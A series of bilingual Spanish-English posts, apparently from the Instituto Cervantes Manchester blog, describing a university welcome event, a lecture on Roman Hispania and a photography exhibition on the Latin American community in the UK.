Hola a todos/as,

El Instituto Cervantes siempre se complace de recibir a los estudiantes universitarios. Como cada año, nuestro Salón de Actos acogió el 30 de septiembre el acto de bienvenida a más de cien alumnos de la Facultad de Estudios Españoles, Portugueses y Latinoamericanos (SPLAS, por sus siglas en inglés) y del Centro para Estudios Latinoamericanos y Caribeños (CLAC), ambos de la Universidad de Mánchester.

El nuevo director del Instituto Cervantes de Mánchester, Francisco Oda, inauguró el acto seguido de los profesores que impartirán clase durante este curso.

El Instituto Cervantes celebra el entusiasmo de los jóvenes universitarios por el estudio de lo español, portugués, latinoamericano y caribeño. ¡Mucha suerte a todo el alumnado y profesorado!

Instituto Cervantes is always glad to receive university students. Just like every year, our Great Hall held on the 30th September the welcome act to more than one hundred students at the Spanish, Portuguese and Latin American Studies (SPLAS) faculty and the Centre for Latin American and Caribbean Studies (CLAC), both from the University of Manchester.

The current director at Manchester’s Instituto Cervantes, Francisco Oda, gave the welcome speech followed by the teachers that will be teaching during this school year.

Instituto Cervantes celebrates the enthusiasm of the university students for Spanish, Portuguese, Latin American and Caribbean studies. Good luck to all the students and teachers!

Fue un verdadero placer contar con el Dr. A. Fear y Ruth Morello (Manchester Classical Association) en la velada de anoche. La charla sobre España Romana que impartió el Dr. A. Fear fue tan interesante como amena, pues consiguió resumir seis siglos de historia de forma muy animada.

Muchísimas gracias a todos los asistentes a la conferencia (¡el Salón de Actos estaba lleno!), esperamos que disfrutaran de la velada tanto como nosotros. Por favor, siéntase libres de dejar sus comentarios y sugerencias, agradeceríamos mucho conocer su opinión al respecto.

It was a real pleasure to have Dr. A. Fear and Ruth Morello (Manchester Classical Association) with us yesterday’s evening. The lecture on Roman Hispania conducted by Dr. A. Fear was as interesting as lively, as he managed to sum up six centuries of history so cheerfully.

Thanks very much to all the people who attend the talk (the Great Hall was crowded!), we do hope you enjoyed the evening as much as we did. El Instituto Cervantes de Manchester acoge desde el 20 de marzo al 8 de mayo una exposición única. Descubriendo la Invisibilidad se compone de 22 fotografías que muestran las vidas y experiencias de diversos miembros de la comunidad latinoamericana en el Reino Unido. La exposición está teniendo una gran acogida por parte del público, quienes se acercan a descubrir las historias que esconde cada fotografía.

El acto de inauguración se celebró el pasado 20 de marzo, donde asistieron a la presentación los mismos fotógrafos, Roxana y Pablo Allison, así como la doctora Cathy Mcilwaine de la Queen Mary University of London, cuyo informe No Longer Invisible ha servido como inspiración para este proyecto, la doctora Catherine Davies de la University of Nottingham y asimismo participaron en el coloquio la doctora Parvathi Kumaraswami de la Universidad de Manchester y Laura Carletti, quien acudió para presentar la innovadora tecnología NFC, gracias a la cual se pueden escuchar los testimonios de los fotografiados mediante nuestros propios smartphones.

Este próximo jueves 10 de abril a las 18:30h continuamos con otra conferencia en torno a la exposición. En esta ocasión, Claudio Chipana, miembro de LARC (Latin American Recognition Campaign) y Maria Canizales Jerez, de Latin Support Group parte de Migrants Supporting Migrants,  compartirán con nosotros su punto de vista y conocimientos sobre la materia. La entrada es libre, por lo que estáis todo el que se quiera acercar esta invitado.

The Instituto Cervantes has become home to a unique exhibition, Uncovering the Invisible, a series of 22 photographs documenting the lives and experiences of members of the Latin American community living here in the UK. Every day visitors come to see the exhibition, and discover the stories behind each photograph.

We celebrated the opening of the exhibition on the 20th of March, where we were joined by the photographers, Roxana and Pablo Allison themselves, as well as Professor Cathy Mcilwaine from Queen Mary University of London, on whose academic research, No Longer Invisible, the series is based. Professor Catherine Davies from the University of Nottingham was also here to discuss about the subject of the identity and recognition of Latin America communities throughout the UK. Professor Parvathi Kumaraswami from the University of Manchester and Laura Carletti, from the University of Nottingham, also participated in the talk. Laura Carletti also introduced the audience to NFC technology, through which everyone with a smartphone is able to listen to the testimonies of the subjects from the pictures.

On this Thursday 10th of April at 18:30, Claudio Chipana, a member of LARC (Latin American Recognition Campaign) and Maria Canizales Jerez, from the Latin Support Group (part of Migrants Supporting Migrants), will share their point of view and expertise on the subject.
